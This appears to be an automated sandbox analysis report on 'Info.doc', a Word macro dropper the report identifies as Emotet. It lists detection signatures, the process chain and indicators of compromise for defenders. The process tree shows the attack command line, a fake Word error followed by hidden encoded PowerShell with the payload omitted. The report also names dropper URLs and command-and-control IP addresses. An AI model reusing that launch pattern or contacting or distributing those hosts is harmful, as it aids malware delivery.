Analysis Report Info.doc

Overview

General Information

Sample Name: Info.doc
Analysis ID: 336957
MD5: 37f5e7c688b8b8f664a9c8430f994f9f
SHA1: 98bd3f717551017517c306bd6d429f5d410a5dcd
SHA256: ab0d8e587ebfbed00f0e6aaf7d82e4d60cb3140c983820f25192303cce71828d

Most interesting Screenshot:

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Enables debug privileges
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2228 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2492 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD [base64-encoded command omitted] MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2408 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2312 cmdline: POwersheLL -w hidden -ENCOD [base64-encoded command omitted] MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2832 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll #1 MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2744 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll #1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 912 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bjbj\rqtl.dgq',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 260 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Frxh\ggkviq.cnk',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2480 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zgwl\aiycp.wss',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2448 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cqxs\necppp.cgm',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2804 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oxpl\fwcrxow.muo',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2956 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pnjy\rwrr.fge',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 2264 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaqt\yasnhb.kgm',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 2240 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hudb\deul.ebq',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 2412 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ohxf\pnwx.dib',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                            • rundll32.exe (PID: 600 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jpux\rkm.xqv',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                              • rundll32.exe (PID: 2432 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oxtv\rmjj.sjq',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                • rundll32.exe (PID: 552 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pwzo\iducd.mjn',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                  • rundll32.exe (PID: 1840 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfwk\bavnhqr.pvy',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                    • rundll32.exe (PID: 2788 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dbsb\hxixh.nee',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                      • rundll32.exe (PID: 1428 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yvvm\ving.mzt',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                        • rundll32.exe (PID: 2840 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Puve\yoqqjfh.eoi',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000D.00000002.2107396520.00000000001C0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security | -
0000000F.00000002.2110398368.00000000001A0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security | -
00000014.00000002.2116797461.0000000000241000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security | -
00000007.00000002.2096970876.00000000002C1000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security | -
00000013.00000002.2115599459.00000000001D1000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security | -
(5 of 31 entries shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
19.2.rundll32.exe.1d0000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security | -
22.2.rundll32.exe.140000.0.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security | -
23.2.rundll32.exe.190000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security | -
14.2.rundll32.exe.2c0000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security | -
21.2.rundll32.exe.1a0000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security | -
(5 of 46 entries shown)

Sigma Overview

System Summary:

Sigma detected: Suspicious Encoded PowerShell Command Line
Source: Process started | Author: Florian Roth, Markus Neis | Data: Command: POwersheLL -w hidden -ENCOD [base64-encoded command omitted]

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: https://dagranitegiare.com/wp-admin/jCH/ | Avira URL Cloud: Label: malware
Source: https://dagranitegiare.com/wp-admin/jCH/P | Avira URL Cloud: Label: malware
Source: http://zhongshixingchuang.com/wp-admin/OTm/ | Avira URL Cloud: Label: malware
Source: http://koreankidsedu.com/wp-content/2cQTh/ | Avira URL Cloud: Label: malware
Source: http://www.greaudstudio.com/docs/FGn/ | Avira URL Cloud: Label: malware
Source: https://dagranitegiare.com | Avira URL Cloud: Label: phishing
Source: http://geoffoglemusic.com/wp-admin/x/ | Avira URL Cloud: Label: malware
Source: https://suriagrofresh.com/serevers/MVDjI/ | Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: dagranitegiare.com | Virustotal: Detection: 8%
Source: https://dagranitegiare.com/wp-admin/jCH/ | Virustotal: Detection: 16%
Source: http://zhongshixingchuang.com/wp-admin/OTm/ | Virustotal: Detection: 15%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll | ReversingLabs: Detection: 93%
Multi AV Scanner detection for submitted file
Source: Info.doc | Virustotal: Detection: 69%
Source: Info.doc | ReversingLabs: Detection: 56%
Machine Learning detection for dropped file
Source: C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 45.119.81.203:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2095683883.0000000001E27000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2095683883.0000000001E27000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2095683883.0000000001E27000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2095683883.0000000001E27000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2095683883.0000000001E27000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2095755658.0000000002080000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: global traffic | DNS query: name: dagranitegiare.com
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 45.119.81.203:443
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 45.119.81.203:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.22:49168 -> 184.66.18.83:80
Potential dropper URLs found in powershell memory
                      Source: powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmpString found in memory: http://zhongshixingchuang.com/wp-admin/OTm/
                      Source: powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmpString found in memory: http://www.greaudstudio.com/docs/FGn/
                      Source: powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmpString found in memory: http://koreankidsedu.com/wp-content/2cQTh/
                      Source: powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmpString found in memory: http://expeditionquest.com/X/
                      Source: powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmpString found in memory: https://suriagrofresh.com/serevers/MVDjI/
                      Source: powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmpString found in memory: http://geoffoglemusic.com/wp-admin/x/
                      Source: powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmpString found in memory: https://dagranitegiare.com/wp-admin/jCH/
                      Source: Joe Sandbox ViewIP Address: 167.71.148.58 167.71.148.58
                      Source: Joe Sandbox ViewIP Address: 202.187.222.40 202.187.222.40
                      Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
                      Source: Joe Sandbox ViewASN Name: TTNET-MYTIMEdotComBerhadMY TTNET-MYTIMEdotComBerhadMY
                      Source: Joe Sandbox ViewASN Name: LVSS-AS-VNLongVanSystemSolutionJSCVN LVSS-AS-VNLongVanSystemSolutionJSCVN
                      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                      Source: global trafficHTTP traffic detected: POST /6nxx5oih3i78uw7qh7/m4898/4op628cd88c/ji50i68zs1/i9hmqo/ HTTP/1.1DNT: 0Referer: 167.71.148.58/6nxx5oih3i78uw7qh7/m4898/4op628cd88c/ji50i68zs1/i9hmqo/Content-Type: multipart/form-data; boundary=----------------------ObDr1IOf89xfNboPuN6RXhUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 167.71.148.58:443Content-Length: 6868Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTPS traffic detected: 45.119.81.203:443 -> 192.168.2.22:49165 version: TLS 1.0
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.66.18.83
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.66.18.83
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.187.222.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.187.222.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.187.222.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.187.222.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.187.222.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.187.222.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 167.71.148.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 167.71.148.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 167.71.148.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 167.71.148.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 167.71.148.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 167.71.148.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 167.71.148.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 167.71.148.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 167.71.148.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 167.71.148.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 167.71.148.58
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4AB48CD7-B28F-4AE5-86AD-026C320EA73C}.tmp
Source: powershell.exe, 00000005.00000002.2105210846.000000001CCC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100613650.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097379165.0000000002060000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2099147774.0000000001E80000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000005.00000002.2095525854.00000000003C7000.00000004.00000020.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown | DNS traffic detected: queries for: dagranitegiare.com
Source: unknown | HTTP traffic detected:
POST /6nxx5oih3i78uw7qh7/m4898/4op628cd88c/ji50i68zs1/i9hmqo/ HTTP/1.1
DNT: 0
Referer: 167.71.148.58/6nxx5oih3i78uw7qh7/m4898/4op628cd88c/ji50i68zs1/i9hmqo/
Content-Type: multipart/form-data; boundary=----------------------ObDr1IOf89xfNboPuN6RXh
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 167.71.148.58:443
Content-Length: 6868
Connection: Keep-Alive
Cache-Control: no-cache
Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmp | String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmp | String found in binary or memory: http://cps.letsencrypt.org0
Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmp | String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: powershell.exe, 00000005.00000002.2104542311.000000001B568000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000005.00000002.2104585609.000000001B59D000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmp | String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000005.00000002.2095550087.0000000000414000.00000004.00000020.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: powershell.exe, 00000005.00000002.2104386508.000000001B4E0000.00000004.00000001.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000005.00000002.2097330160.0000000002F92000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmp | String found in binary or memory: http://expeditionquest.com/X/
Source: powershell.exe, 00000005.00000002.2097330160.0000000002F92000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmp | String found in binary or memory: http://geoffoglemusic.com/wp-admin/x/
Source: powershell.exe, 00000005.00000002.2105210846.000000001CCC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100613650.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097379165.0000000002060000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2099147774.0000000001E80000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: powershell.exe, 00000005.00000002.2105210846.000000001CCC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100613650.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097379165.0000000002060000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2099147774.0000000001E80000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2097330160.0000000002F92000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmp | String found in binary or memory: http://koreankidsedu.com/wp-content/2cQTh/
Source: powershell.exe, 00000005.00000002.2106134219.000000001CEA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2101263831.0000000001D47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097603957.0000000002247000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.2111902319.0000000002207000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: powershell.exe, 00000005.00000002.2106134219.000000001CEA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2101263831.0000000001D47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097603957.0000000002247000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.2111902319.0000000002207000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000005.00000002.2104542311.000000001B568000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000005.00000002.2104542311.000000001B568000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmp | String found in binary or memory: http://r3.i.lencr.org/0
Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmp | String found in binary or memory: http://r3.o.lencr.org0
Source: powershell.exe, 00000005.00000002.2096214706.0000000002460000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098993097.0000000002930000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000005.00000002.2106930484.000000001D360000.00000002.00000001.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: powershell.exe, 00000005.00000002.2106134219.000000001CEA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2101263831.0000000001D47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097603957.0000000002247000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.2111902319.0000000002207000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2106134219.000000001CEA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2101263831.0000000001D47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097603957.0000000002247000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.2111902319.0000000002207000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2096214706.0000000002460000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098993097.0000000002930000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2101133353.0000000002800000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000005.00000002.2097330160.0000000002F92000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmp | String found in binary or memory: http://www.greaudstudio.com/docs/FGn/
Source: powershell.exe, 00000005.00000002.2105210846.000000001CCC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100613650.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097379165.0000000002060000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2099147774.0000000001E80000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: powershell.exe, 00000005.00000002.2106134219.000000001CEA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2101263831.0000000001D47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097603957.0000000002247000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.2111902319.0000000002207000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000005.00000002.2105210846.000000001CCC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100613650.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097379165.0000000002060000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2099147774.0000000001E80000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000008.00000002.2099147774.0000000001E80000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2097330160.0000000002F92000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmp | String found in binary or memory: http://zhongshixingchuang.com/wp-admin/OTm/
Source: powershell.exe, 00000005.00000002.2097330160.0000000002F92000.00000004.00000001.sdmp | String found in binary or memory: https://dagranitegiare.com
Source: powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmp | String found in binary or memory: https://dagranitegiare.com/wp-admin/jCH/
Source: powershell.exe, 00000005.00000002.2097330160.0000000002F92000.00000004.00000001.sdmp | String found in binary or memory: https://dagranitegiare.com/wp-admin/jCH/P
Source: powershell.exe, 00000005.00000002.2104542311.000000001B568000.00000004.00000001.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000005.00000002.2097330160.0000000002F92000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmp | String found in binary or memory: https://suriagrofresh.com/serevers/MVDjI/
Source: unknown | Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown | Network traffic detected: HTTP traffic on port 49171 -> 443

E-Banking Fraud:

Yara detected Emotet
Source: Yara match | File source: 0000000D.00000002.2107396520.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2110398368.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.2116797461.0000000000241000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2096970876.00000000002C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.2115599459.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.2117982629.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2109063945.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.2119357685.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.2119622142.0000000000221000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.2111825774.00000000006B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2106262075.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2099926310.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
